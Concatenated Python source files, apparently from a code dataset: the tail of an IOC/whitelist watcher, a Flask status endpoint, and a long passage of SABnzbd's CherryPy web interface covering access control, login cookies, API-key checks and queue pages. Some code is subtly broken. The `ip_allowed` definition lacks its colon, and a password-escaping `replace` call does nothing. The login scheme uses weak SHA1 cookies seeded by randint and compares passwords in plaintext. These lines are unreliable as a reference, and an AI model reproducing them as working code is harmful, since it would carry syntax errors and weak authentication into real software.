whitelist.add(elem["type"], elem["element"], "watcher")
w["status"] = True
except:
continue
for elem in to_delete:
try:
whitelist.delete_by_value(elem["element"])
w["status"] = True
except:
continue
if False in [w["status"] for w in watchers]:
time.sleep(60)
else:
break
p1 = Process(target=watch_iocs)
p2 = Process(target=watch_whitelists)
p1.start()
p2.start()
|
rest.py
|
import threading
from queue import Queue
from celery.task.control import inspect
from flask import Blueprint, jsonify, current_app
from app import db
from app.errors import register_errors
base_blueprint = Blueprint('', __name__)
register_errors(base_blueprint)
def are_celery_workers_running():
def worker(q):
i = inspect()
q.put(i.stats())
q = Queue()
threading.Thread(target=worker, args=(q,)).start()
result = q.get()
if result:
return 'celery@worker-{}'.format(current_app.config.get('ENVIRONMENT')) in result
@base_blueprint.route('/')
def get_info():
workers_running = False
if 'http://localhost' not in current_app.config['API_BASE_URL']:
workers_running = are_celery_workers_running()
current_app.logger.info('get_info')
query = 'SELECT version_num FROM alembic_version'
try:
full_name = db.session.execute(query).fetchone()[0]
except Exception as e:
current_app.logger.error('Database exception: %r', e)
full_name = 'Database error, check logs'
resp = {
'environment': current_app.config['ENVIRONMENT'],
'info': full_name,
'commit': current_app.config['GITHUB_SHA'],
'workers': 'Running' if workers_running else 'Not running'
}
if current_app.config.get('EMAIL_RESTRICT'): # pragma: no cover
resp['email_restrict'] = True
return jsonify(resp)
@base_blueprint.route('/info')
def get_info_without_db():
current_app.logger.info('get_info_without_db')
resp = {
'environment': current_app.config['ENVIRONMENT'],
'commit': current_app.config['GITHUB_SHA'],
}
if current_app.config.get('EMAIL_RESTRICT'): # pragma: no cover
resp['email_restrict'] = True
return jsonify(resp)
|
interface.py
|
#!/usr/bin/python -OO
# Copyright 2007-2019 The SABnzbd-Team <team@sabnzbd.org>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
sabnzbd.interface - webinterface
"""
import os
import time
import cherrypy
import logging
import urllib
import json
import re
import hashlib
import socket
import ssl
import functools
from threading import Thread
from random import randint
from xml.sax.saxutils import escape
from sabnzbd.utils.rsslib import RSS, Item
import sabnzbd
import sabnzbd.rss
import sabnzbd.scheduler as scheduler
from Cheetah.Template import Template
from sabnzbd.misc import real_path, to_units, from_units, time_format, \
long_path, calc_age, same_file, probablyipv4, probablyipv6, \
int_conv, globber, globber_full, remove_all, get_base_url
from sabnzbd.newswrapper import GetServerParms
from sabnzbd.bpsmeter import BPSMeter
from sabnzbd.encoding import TRANS, xml_name, LatinFilter, unicoder, special_fixer, \
platform_encode
import sabnzbd.config as config
import sabnzbd.cfg as cfg
import sabnzbd.notifier as notifier
import sabnzbd.newsunpack
from sabnzbd.downloader import Downloader
from sabnzbd.nzbqueue import NzbQueue
from sabnzbd.utils.servertests import test_nntp_server_dict
from sabnzbd.decoder import HAVE_YENC, SABYENC_ENABLED
from sabnzbd.utils.diskspeed import diskspeedmeasure
from sabnzbd.utils.getperformance import getpystone
from sabnzbd.constants import NORMAL_PRIORITY, MEBI, DEF_SKIN_COLORS, \
DEF_STDCONFIG, DEF_MAIN_TMPL, DEFAULT_PRIORITY
from sabnzbd.lang import list_languages
from sabnzbd.api import list_scripts, list_cats, del_from_section, \
api_handler, build_queue, remove_callable, build_status, \
retry_job, retry_all_jobs, build_header, build_history, del_job_files, \
format_bytes, std_time, report, del_hist_job, Ttemplate, build_queue_header, \
_api_test_email, _api_test_notif
##############################################################################
# Global constants
##############################################################################
DIRECTIVES = {
'directiveStartToken': '<!--#',
'directiveEndToken': '#-->',
'prioritizeSearchListOverSelf': True
}
FILTER = LatinFilter
##############################################################################
# Security functions
##############################################################################
def secured_expose(wrap_func=None, check_configlock=False, check_session_key=False):
""" Wrapper for both cherrypy.expose and login/access check """
if not wrap_func:
return functools.partial(secured_expose, check_configlock=check_configlock, check_session_key=check_session_key)
# Expose to cherrypy
wrap_func.exposed = True
@functools.wraps(wrap_func)
def internal_wrap(*args, **kwargs):
# Add X-Frame-Headers headers to page-requests
if cfg.x_frame_options():
cherrypy.response.headers['X-Frame-Options'] = 'SameOrigin'
# Check if config is locked
if check_configlock and cfg.configlock():
cherrypy.response.status = 403
return 'Access denied - Configuration locked'
# Check if external access
if not check_access():
cherrypy.response.status = 403
return 'Access denied'
# Verify login status, only for non-key pages
if not check_login() and not check_session_key:
raise Raiser('/login/')
# Verify host used for the visit
if not check_hostname():
cherrypy.response.status = 403
return 'Access denied - Hostname verification failed: https://sabnzbd.org/hostname-check'
# Some pages need correct session key
if check_session_key:
msg = check_session(kwargs)
if msg:
return msg
# All good, cool!
return wrap_func(*args, **kwargs)
return internal_wrap
def check_access(access_type=4):
""" Check if external address is allowed given access_type:
1=nzb
2=api
3=full_api
4=webui
5=webui with login for external
"""
referrer = cherrypy.request.remote.ip
xff = cherrypy.request.headers.get('X-Forwarded-For')
allowed = ip_allowed(referrer, access_type)
if xff:
allowed = allowed and ip_allowed(xff, access_type)
if not allowed:
logging.debug('Refused connection from %s', referrer)
return allowed
def ip_allowed(referrer, access_type)
# CherryPy will report ::ffff:192.168.0.10 on dual-stack situation
# It will always contain that ::ffff: prefix
range_ok = not cfg.local_ranges() or bool([1 for r in cfg.local_ranges() if (referrer.startswith(r) or referrer.replace('::ffff:', '').startswith(r))])
allowed = referrer in ('127.0.0.1', '::ffff:127.0.0.1', '::1') or range_ok or access_type <= cfg.inet_exposure()
return allowed
def check_hostname():
""" Check if hostname is allowed, to mitigate DNS-rebinding attack.
Similar to CVE-2019-5702, we need to add protection even
if only allowed to be accessed via localhost.
"""
# If login is enabled, no API-key can be deducted
if cfg.username() and cfg.password():
return True
# Don't allow requests without Host
host = cherrypy.request.headers.get('Host')
if not host:
return False
# Remove the port-part (like ':8080'), if it is there, always on the right hand side.
# Not to be confused with IPv6 colons (within square brackets)
host = re.sub(':[0123456789]+$', '', host).lower()
# Fine if localhost or IP
if host == 'localhost' or probablyipv4(host) or probablyipv6(host):
return True
# Check on the whitelist
if host in cfg.host_whitelist():
return True
# Fine if ends with ".local" or ".local.", aka mDNS name
# See rfc6762 Multicast DNS
if host.endswith(('.local', '.local.')):
return True
# Ohoh, bad
log_warning_and_ip(T('Refused connection with hostname "%s" from:') % host)
return False
# Create a more unique ID for each instance
COOKIE_SECRET = str(randint(1000,100000)*os.getpid())
def set_login_cookie(remove=False, remember_me=False):
""" We try to set a cookie as unique as possible
to the current user. Based on it's IP and the
current process ID of the SAB instance and a random
number, so cookies cannot be re-used
"""
salt = randint(1,1000)
cherrypy.response.cookie['login_cookie'] = hashlib.sha1(str(salt) + cherrypy.request.remote.ip + COOKIE_SECRET).hexdigest()
cherrypy.response.cookie['login_cookie']['path'] = '/'
cherrypy.response.cookie['login_cookie']['httponly'] = 1
cherrypy.response.cookie['login_salt'] = salt
cherrypy.response.cookie['login_salt']['path'] = '/'
cherrypy.response.cookie['login_salt']['httponly'] = 1
# If we want to be remembered
if remember_me:
cherrypy.response.cookie['login_cookie']['max-age'] = 3600*24*14
cherrypy.response.cookie['login_salt']['max-age'] = 3600*24*14
# To remove
if remove:
cherrypy.response.cookie['login_cookie']['expires'] = 0
cherrypy.response.cookie['login_salt']['expires'] = 0
else:
# Notify about new login
notifier.send_notification(T('User logged in'), T('User logged in to the web interface'), 'new_login')
def check_login_cookie():
# Do we have everything?
if 'login_cookie' not in cherrypy.request.cookie or 'login_salt' not in cherrypy.request.cookie:
return False
return cherrypy.request.cookie['login_cookie'].value == hashlib.sha1(str(cherrypy.request.cookie['login_salt'].value) + cherrypy.request.remote.ip + COOKIE_SECRET).hexdigest()
def check_login():
# Not when no authentication required or basic-auth is on
if not cfg.html_login() or not cfg.username() or not cfg.password():
return True
# If we show login for external IP, by using access_type=6 we can check if IP match
if cfg.inet_exposure() == 5 and check_access(access_type=6):
return True
# Check the cookie
return check_login_cookie()
def get_users():
users = {cfg.username(): cfg.password()}
return users
def encrypt_pwd(pwd):
return pwd
def set_auth(conf):
""" Set the authentication for CherryPy """
if cfg.username() and cfg.password() and not cfg.html_login():
conf.update({'tools.basic_auth.on': True, 'tools.basic_auth.realm': 'SABnzbd',
'tools.basic_auth.users': get_users, 'tools.basic_auth.encrypt': encrypt_pwd})
conf.update({'/api': {'tools.basic_auth.on': False},
'%s/api' % cfg.url_base(): {'tools.basic_auth.on': False},
})
else:
conf.update({'tools.basic_auth.on': False})
def check_session(kwargs):
""" Check session key """
if not check_access():
return u'Access denied'
key = kwargs.get('session')
if not key:
key = kwargs.get('apikey')
msg = None
if not key:
log_warning_and_ip(T('Missing Session key'))
msg = T('Error: Session Key Required')
elif key != cfg.api_key():
log_warning_and_ip(T('Error: Session Key Incorrect'))
msg = T('Error: Session Key Incorrect')
return msg
def check_apikey(kwargs, nokey=False):
""" Check api key or nzbkey
Return None when OK, otherwise an error message
"""
output = kwargs.get('output')
mode = kwargs.get('mode', '')
name = kwargs.get('name', '')
# Lookup required access level
req_access = sabnzbd.api.api_level(mode, name)
if req_access == 1 and check_access(1):
# NZB-only actions
pass
elif not check_access(req_access):
return report(output, 'Access denied')
# First check APIKEY, if OK that's sufficient
if not (cfg.disable_key() or nokey):
key = kwargs.get('apikey')
if not key:
key = kwargs.get('session')
if not key:
if cfg.api_warnings():
log_warning_and_ip(T('API Key missing, please enter the api key from Config->General into your 3rd party program:'))
return report(output, 'API Key Required')
elif req_access == 1 and key == cfg.nzb_key():
return None
elif key == cfg.api_key():
return None
else:
log_warning_and_ip(T('API Key incorrect, Use the api key from Config->General in your 3rd party program:'))
return report(output, 'API Key Incorrect')
# No active APIKEY, check web credentials instead
if cfg.username() and cfg.password():
if check_login() or (kwargs.get('ma_username') == cfg.username() and kwargs.get('ma_password') == cfg.password()):
pass
else:
if cfg.api_warnings():
log_warning_and_ip(T('Authentication missing, please enter username/password from Config->General into your 3rd party program:'))
return report(output, 'Missing authentication')
return None
def log_warning_and_ip(txt):
""" Include the IP and the Proxy-IP for warnings """
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
txt = '%s %s (X-Forwarded-For: %s)>%s' % (txt, cherrypy.request.remote.ip, xff, cherrypy.request.headers.get('User-Agent', '??'))
else:
txt = '%s %s>%s' % (txt, cherrypy.request.remote.ip, cherrypy.request.headers.get('User-Agent', '??'))
logging.warning('%s', txt)
##############################################################################
# Helper raiser functions
##############################################################################
def Raiser(root='', **kwargs):
args = {}
for key in kwargs:
val = kwargs.get(key)
if val:
args[key] = val
# Add extras
if args:
root = '%s?%s' % (root, urllib.urlencode(args))
# Optionally add the leading /sabnzbd/ (or what the user set)
if not root.startswith(cfg.url_base()):
root = cherrypy.request.script_name + root
# Send the redirect
return cherrypy.HTTPRedirect(root)
def queueRaiser(root, kwargs):
return Raiser(root, start=kwargs.get('start'),
limit=kwargs.get('limit'),
search=kwargs.get('search'))
def rssRaiser(root, kwargs):
return Raiser(root, feed=kwargs.get('feed'))
##############################################################################
# Page definitions
##############################################################################
class MainPage(object):
def __init__(self):
self.__root = '/'
# Add all sub-pages
self.login = LoginPage()
self.queue = QueuePage('/queue/')
self.history = HistoryPage('/history/')
self.status = Status('/status/')
self.config = ConfigPage('/config/')
self.nzb = NzoPage('/nzb/')
self.wizard = Wizard('/wizard/')
@secured_expose
def index(self, **kwargs):
if not cfg.notified_new_skin() and cfg.web_dir() != 'Glitter':
logging.warning(T('Try our new skin Glitter! Fresh new design that is optimized for desktop and mobile devices. Go to Config -> General to change your skin.'))
if not cfg.notified_new_skin():
cfg.notified_new_skin.set(1)
config.save_config()
if kwargs.get('skip_wizard') or config.get_servers():
info = build_header()
info['scripts'] = list_scripts(default=True)
info['script'] = 'Default'
info['cat'] = 'Default'
info['categories'] = list_cats(True)
info['have_rss_defined'] = bool(config.get_rss())
info['have_watched_dir'] = bool(cfg.dirscan_dir())
# Have logout only with HTML and if inet=5, only when we are external
info['have_logout'] = cfg.username() and cfg.password() and (cfg.html_login() and (cfg.inet_exposure() < 5 or (cfg.inet_exposure() == 5 and not check_access(access_type=6))))
bytespersec_list = BPSMeter.do.get_bps_list()
info['bytespersec_list'] = ','.join([str(bps) for bps in bytespersec_list])
# For Glitter we pre-load the JSON output
if 'Glitter' in sabnzbd.WEB_DIR:
# Queue
queue = build_queue(limit=cfg.queue_limit(), output='json')[0]
# History
history = {}
grand, month, week, day = BPSMeter.do.get_sums()
history['total_size'], history['month_size'], history['week_size'], history['day_size'] = \
to_units(grand), to_units(month), to_units(week), to_units(day)
history['slots'], fetched_items, history['noofslots'] = build_history(limit=cfg.history_limit(), output='json')
# Make sure the JSON works, otherwise leave empty
try:
info['preload_queue'] = json.dumps({'queue': remove_callable(queue)})
info['preload_history'] = json.dumps({'history': history})
except UnicodeDecodeError:
# We use the javascript recognized 'false'
info['preload_queue'] = 'false'
info['preload_history'] = 'false'
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'main.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
else:
# Redirect to the setup wizard
raise cherrypy.HTTPRedirect('%s/wizard/' % cfg.url_base())
@secured_expose(check_session_key=True)
def addFile(self, **kwargs):
nzbfile = kwargs.get('nzbfile')
if nzbfile is not None and nzbfile.filename:
if nzbfile.value or nzbfile.file:
sabnzbd.add_nzbfile(nzbfile, kwargs.get('pp'), kwargs.get('script'),
kwargs.get('cat'), kwargs.get('priority', NORMAL_PRIORITY))
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
# Check for PID
pid_in = kwargs.get('pid')
if pid_in and int(pid_in) != os.getpid():
return "Incorrect PID for this instance, remove PID from URL to initiate shutdown."
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise Raiser(self.__root)
@cherrypy.expose
def tapi(self, **kwargs):
""" Handler for API over http, for template use """
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@cherrypy.expose
def api(self, **kwargs):
""" Handler for API over http, with explicit authentication parameters """
if cfg.api_logging():
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
if xff:
logging.debug('API-call from %s (X-Forwarded-For: %s) [%s] %s', cherrypy.request.remote.ip,
xff, cherrypy.request.headers.get('User-Agent', '??'), kwargs)
else:
logging.debug('API-call from %s [%s] %s', cherrypy.request.remote.ip,
cherrypy.request.headers.get('User-Agent', '??'), kwargs)
mode = kwargs.get('mode', '')
if isinstance(mode, list):
mode = mode[0]
kwargs['mode'] = mode
name = kwargs.get('name', '')
if isinstance(name, list):
name = name[0]
kwargs['name'] = name
if mode not in ('version', 'auth'):
msg = check_apikey(kwargs)
if msg:
return msg
return api_handler(kwargs)
@secured_expose
def scriptlog(self, **kwargs):
""" Duplicate of scriptlog of History, needed for some skins """
# No session key check, due to fixed URLs
name = kwargs.get('name')
if name:
history_db = sabnzbd.get_db_connection()
return ShowString(history_db.get_name(name), history_db.get_script_log(name))
else:
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry(self, **kwargs):
""" Duplicate of retry of History, needed for some skins """
job = kwargs.get('job', '')
url = kwargs.get('url', '').strip()
pp = kwargs.get('pp')
cat = kwargs.get('cat')
script = kwargs.get('script')
if url:
sabnzbd.add_url(url, pp, script, cat, nzbname=kwargs.get('nzbname'))
del_hist_job(job, del_files=True)
raise Raiser(self.__root)
@secured_expose(check_session_key=True)
def retry_pp(self, **kwargs):
# Duplicate of History/retry_pp to please the SMPL skin :(
retry_job(kwargs.get('job'), kwargs.get('nzbfile'), kwargs.get('password'))
raise Raiser(self.__root)
@secured_expose
def robots_txt(self, **kwargs):
""" Keep web crawlers out """
cherrypy.response.headers['Content-Type'] = 'text/plain'
return 'User-agent: *\nDisallow: /\n'
##############################################################################
class Wizard(object):
def __init__(self, root):
self.__root = root
@secured_expose(check_configlock=True)
def index(self, **kwargs):
""" Show the language selection page """
if sabnzbd.WIN32:
import util.apireg
cfg.language.set(util.apireg.get_install_lng())
logging.debug('Installer language code "%s"', cfg.language())
info = build_header(sabnzbd.WIZARD_DIR)
info['languages'] = list_languages()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'index.html'),
searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def one(self, **kwargs):
""" Accept language and show server page """
if kwargs.get('lang'):
cfg.language.set(kwargs.get('lang'))
# Always setup Glitter
change_web_dir('Glitter - Default')
info = build_header(sabnzbd.WIZARD_DIR)
info['have_ssl_context'] = sabnzbd.HAVE_SSL_CONTEXT
# Just in case, add server
servers = config.get_servers()
if not servers:
info['host'] = ''
info['port'] = ''
info['username'] = ''
info['password'] = ''
info['connections'] = ''
info['ssl'] = 0
info['ssl_verify'] = 2
else:
# Sort servers to get the first enabled one
server_names = sorted(servers.keys(), key=lambda svr: '%d%02d%s' % (int(not servers[svr].enable()), servers[svr].priority(), servers[svr].displayname().lower()))
for server in server_names:
# If there are multiple servers, just use the first enabled one
s = servers[server]
info['host'] = s.host()
info['port'] = s.port()
info['username'] = s.username()
info['password'] = s.password.get_stars()
info['connections'] = s.connections()
info['ssl'] = s.ssl()
info['ssl_verify'] = s.ssl_verify()
if s.enable():
break
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'one.html'),
searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_configlock=True)
def two(self, **kwargs):
""" Accept server and show the final page for restart """
# Save server details
if kwargs:
kwargs['enable'] = 1
handle_server(kwargs)
config.save_config()
# Show Restart screen
info = build_header(sabnzbd.WIZARD_DIR)
info['access_url'], info['urls'] = get_access_info()
info['download_dir'] = cfg.download_dir.get_path()
info['complete_dir'] = cfg.complete_dir.get_path()
template = Template(file=os.path.join(sabnzbd.WIZARD_DIR, 'two.html'),
searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose
def exit(self, **kwargs):
""" Stop SABnzbd """
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
def get_access_info():
""" Build up a list of url's that sabnzbd can be accessed from """
# Access_url is used to provide the user a link to sabnzbd depending on the host
access_uri = 'localhost'
cherryhost = cfg.cherryhost()
if cherryhost == '0.0.0.0':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
try:
addresses = socket.getaddrinfo(host, None)
except:
addresses = []
for addr in addresses:
address = addr[4][0]
# Filter out ipv6 addresses (should not be allowed)
if ':' not in address and address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif cherryhost == '::':
host = socket.gethostname()
socks = [host]
# Grab a list of all ips for the hostname
addresses = socket.getaddrinfo(host, None)
for addr in addresses:
address = addr[4][0]
# Only ipv6 addresses will work
if ':' in address:
address = '[%s]' % address
if address not in socks:
socks.append(address)
if "host" in cherrypy.request.headers:
host = cherrypy.request.headers['host']
host = host.rsplit(':')[0]
access_uri = host
socks.insert(0, host)
else:
socks.insert(0, 'localhost')
elif not cherryhost:
socks = [socket.gethostname()]
access_uri = socket.gethostname()
else:
socks = [cherryhost]
access_uri = cherryhost
urls = []
for sock in socks:
if sock:
if cfg.enable_https() and cfg.https_port():
url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
url = 'https://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
else:
url = 'http://%s:%s%s' % (sock, cfg.cherryport(), cfg.url_base())
urls.append(url)
if cfg.enable_https() and cfg.https_port():
access_url = 'https://%s:%s%s' % (sock, cfg.https_port(), cfg.url_base())
elif cfg.enable_https():
access_url = 'https://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
else:
access_url = 'http://%s:%s%s' % (access_uri, cfg.cherryport(), cfg.url_base())
return access_url, urls
##############################################################################
class LoginPage(object):
@cherrypy.expose
def index(self, **kwargs):
# Base output var
info = build_header(sabnzbd.WEB_DIR_CONFIG)
info['error'] = ''
# Logout?
if kwargs.get('logout'):
set_login_cookie(remove=True)
raise Raiser()
# Check if there's even a username/password set
if check_login():
raise Raiser(cherrypy.request.script_name + '/')
# Was it proxy forwarded?
xff = cherrypy.request.headers.get('X-Forwarded-For')
# Check login info
if kwargs.get('username') == cfg.username() and kwargs.get('password') == cfg.password():
# Save login cookie
set_login_cookie(remember_me=kwargs.get('remember_me', False))
# Log the succes
if xff:
logging.info('Successful login from %s (X-Forwarded-For: %s)', cherrypy.request.remote.ip, xff)
else:
logging.info('Successful login from %s', cherrypy.request.remote.ip)
# Redirect
raise Raiser(cherrypy.request.script_name + '/')
elif kwargs.get('username') or kwargs.get('password'):
info['error'] = T('Authentication failed, check username/password.')
# Warn about the potential security problem
fail_msg = T('Unsuccessful login attempt from %s') % cherrypy.request.remote.ip
if xff:
fail_msg = '%s (X-Forwarded-For: %s)' % (fail_msg, xff)
logging.warning(fail_msg)
# Show login
template = Template(file=os.path.join(sabnzbd.WEB_DIR_CONFIG, 'login', 'main.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
##############################################################################
class NzoPage(object):
def __init__(self, root):
self.__root = root
self.__cached_selection = {} # None
@secured_expose
def default(self, *args, **kwargs):
# Allowed URL's
# /nzb/SABnzbd_nzo_xxxxx/
# /nzb/SABnzbd_nzo_xxxxx/details
# /nzb/SABnzbd_nzo_xxxxx/files
# /nzb/SABnzbd_nzo_xxxxx/bulk_operation
# /nzb/SABnzbd_nzo_xxxxx/save
nzo_id = None
for a in args:
if a.startswith('SABnzbd_nzo'):
nzo_id = a
break
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo_id and nzo:
info, pnfo_list, bytespersec, q_size, bytes_left_previous_page = build_queue_header()
# /SABnzbd_nzo_xxxxx/bulk_operation
if 'bulk_operation' in args:
return self.bulk_operation(nzo_id, kwargs)
# /SABnzbd_nzo_xxxxx/details
elif 'details' in args:
info = self.nzo_details(info, pnfo_list, nzo_id)
# /SABnzbd_nzo_xxxxx/files
elif 'files' in args:
info = self.nzo_files(info, nzo_id)
# /SABnzbd_nzo_xxxxx/save
elif 'save' in args:
self.save_details(nzo_id, args, kwargs)
return # never reached
# /SABnzbd_nzo_xxxxx/
else:
info = self.nzo_details(info, pnfo_list, nzo_id)
info = self.nzo_files(info, nzo_id)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'nzo.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
else:
# Job no longer exists, go to main page
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def nzo_details(self, info, pnfo_list, nzo_id):
slot = {}
n = 0
for pnfo in pnfo_list:
if pnfo.nzo_id == nzo_id:
nzo = NzbQueue.do.get_nzo(nzo_id)
repair = pnfo.repair
unpack = pnfo.unpack
delete = pnfo.delete
unpackopts = sabnzbd.opts_to_pp(repair, unpack, delete)
script = pnfo.script
if script is None:
script = 'None'
cat = pnfo.category
if not cat:
cat = 'None'
filename_pw = xml_name(nzo.final_name_pw_clean)
filename = xml_name(nzo.final_name)
if nzo.password:
password = xml_name(nzo.password).replace('"', '"')
else:
password = ''
priority = pnfo.priority
slot['nzo_id'] = str(nzo_id)
slot['cat'] = cat
slot['filename'] = filename_pw
slot['filename_clean'] = filename
slot['password'] = password or ''
slot['script'] = script
slot['priority'] = str(priority)
slot['unpackopts'] = str(unpackopts)
info['index'] = n
break
n += 1
info['slot'] = slot
info['scripts'] = list_scripts()
info['categories'] = list_cats()
info['noofslots'] = len(pnfo_list)
return info
def nzo_files(self, info, nzo_id):
active = []
nzo = NzbQueue.do.get_nzo(nzo_id)
if nzo:
pnfo = nzo.gather_info(full=True)
info['nzo_id'] = pnfo.nzo_id
info['filename'] = xml_name(pnfo.filename)
for nzf in pnfo.active_files:
checked = False
if nzf.nzf_id in self.__cached_selection and \
self.__cached_selection[nzf.nzf_id] == 'on':
checked = True
active.append({'filename': xml_name(nzf.filename if nzf.filename else nzf.subject),
'mbleft': "%.2f" % (nzf.bytes_left / MEBI),
'mb': "%.2f" % (nzf.bytes / MEBI),
'size': format_bytes(nzf.bytes),
'sizeleft': format_bytes(nzf.bytes_left),
'nzf_id': nzf.nzf_id,
'age': calc_age(nzf.date),
'checked': checked})
info['active_files'] = active
return info
def save_details(self, nzo_id, args, kwargs):
index = kwargs.get('index', None)
name = kwargs.get('name', None)
password = kwargs.get('password', None)
if password == "":
password = None
pp = kwargs.get('pp', None)
script = kwargs.get('script', None)
cat = kwargs.get('cat', None)
priority = kwargs.get('priority', None)
nzo = NzbQueue.do.get_nzo(nzo_id)
if index is not None:
NzbQueue.do.switch(nzo_id, index)
if name is not None:
NzbQueue.do.change_name(nzo_id, special_fixer(name), password)
if cat is not None and nzo.cat is not cat and not (nzo.cat == '*' and cat == 'Default'):
NzbQueue.do.change_cat(nzo_id, cat, priority)
# Category changed, so make sure "Default" attributes aren't set again
if script == 'Default':
script = None
if priority == 'Default':
priority = None
if pp == 'Default':
pp = None
if script is not None and nzo.script != script:
NzbQueue.do.change_script(nzo_id, script)
if pp is not None and nzo.pp != pp:
NzbQueue.do.change_opts(nzo_id, pp)
if priority is not None and nzo.priority != int(priority):
NzbQueue.do.set_priority(nzo_id, priority)
raise Raiser(cherrypy.lib.httputil.urljoin(self.__root, '../queue/'))
def bulk_operation(self, nzo_id, kwargs):
self.__cached_selection = kwargs
if kwargs['action_key'] == 'Delete':
for key in kwargs:
if kwargs[key] == 'on':
NzbQueue.do.remove_nzf(nzo_id, key, force_delete=True)
elif kwargs['action_key'] in ('Top', 'Up', 'Down', 'Bottom'):
nzf_ids = []
for key in kwargs:
if kwargs[key] == 'on':
nzf_ids.append(key)
size = int_conv(kwargs.get('action_size', 1))
if kwargs['action_key'] == 'Top':
NzbQueue.do.move_top_bulk(nzo_id, nzf_ids)
elif kwargs['action_key'] == 'Up':
NzbQueue.do.move_up_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Down':
NzbQueue.do.move_down_bulk(nzo_id, nzf_ids, size)
elif kwargs['action_key'] == 'Bottom':
NzbQueue.do.move_bottom_bulk(nzo_id, nzf_ids)
if NzbQueue.do.get_nzo(nzo_id):
url = cherrypy.lib.httputil.urljoin(self.__root, nzo_id)
else:
url = cherrypy.lib.httputil.urljoin(self.__root, '../queue')
if url and not url.endswith('/'):
url += '/'
raise Raiser(url)
##############################################################################
class QueuePage(object):
def __init__(self, root):
self.__root = root
@secured_expose
def index(self, **kwargs):
start = int_conv(kwargs.get('start'))
limit = int_conv(kwargs.get('limit'))
search = kwargs.get('search')
info, _pnfo_list, _bytespersec = build_queue(start=start, limit=limit, trans=True, search=search)
template = Template(file=os.path.join(sabnzbd.WEB_DIR, 'queue.tmpl'),
filter=FILTER, searchList=[info], compilerSettings=DIRECTIVES)
return template.respond()
@secured_expose(check_session_key=True)
def delete(self, **kwargs):
uid = kwargs.get('uid')
del_files = int_conv(kwargs.get('del_files'))
if uid:
NzbQueue.do.remove(uid, False, keep_basic=not del_files, del_files=del_files)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def purge(self, **kwargs):
NzbQueue.do.remove_all(kwargs.get('search'))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_queue_complete_action(self, **kwargs):
""" Action or script to be performed once the queue has been completed
Scripts are prefixed with 'script_'
"""
action = kwargs.get('action')
sabnzbd.change_queue_complete_action(action)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def switch(self, **kwargs):
uid1 = kwargs.get('uid1')
uid2 = kwargs.get('uid2')
if uid1 and uid2:
NzbQueue.do.switch(uid1, uid2)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_opts(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
pp = kwargs.get('pp', '')
if nzo_id and pp and pp.isdigit():
NzbQueue.do.change_opts(nzo_id, int(pp))
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_script(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
script = kwargs.get('script', '')
if nzo_id and script:
if script == 'None':
script = None
NzbQueue.do.change_script(nzo_id, script)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def change_cat(self, **kwargs):
nzo_id = kwargs.get('nzo_id')
cat = kwargs.get('cat', '')
if nzo_id and cat:
if cat == 'None':
cat = None
NzbQueue.do.change_cat(nzo_id, cat)
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def shutdown(self, **kwargs):
sabnzbd.shutdown_program()
return T('SABnzbd shutdown finished')
@secured_expose(check_session_key=True)
def pause(self, **kwargs):
scheduler.plan_resume(0)
Downloader.do.pause()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def resume(self, **kwargs):
scheduler.plan_resume(0)
sabnzbd.unpause_all()
raise queueRaiser(self.__root, kwargs)
@secured_expose(check_session_key=True)
def pause_nzo(self, **kwargs):
uid = kwargs.get('uid', '')
NzbQueue.do.pause_multiple_nzo(uid.split(','))
raise queueRaiser(self.__root, kwargs)
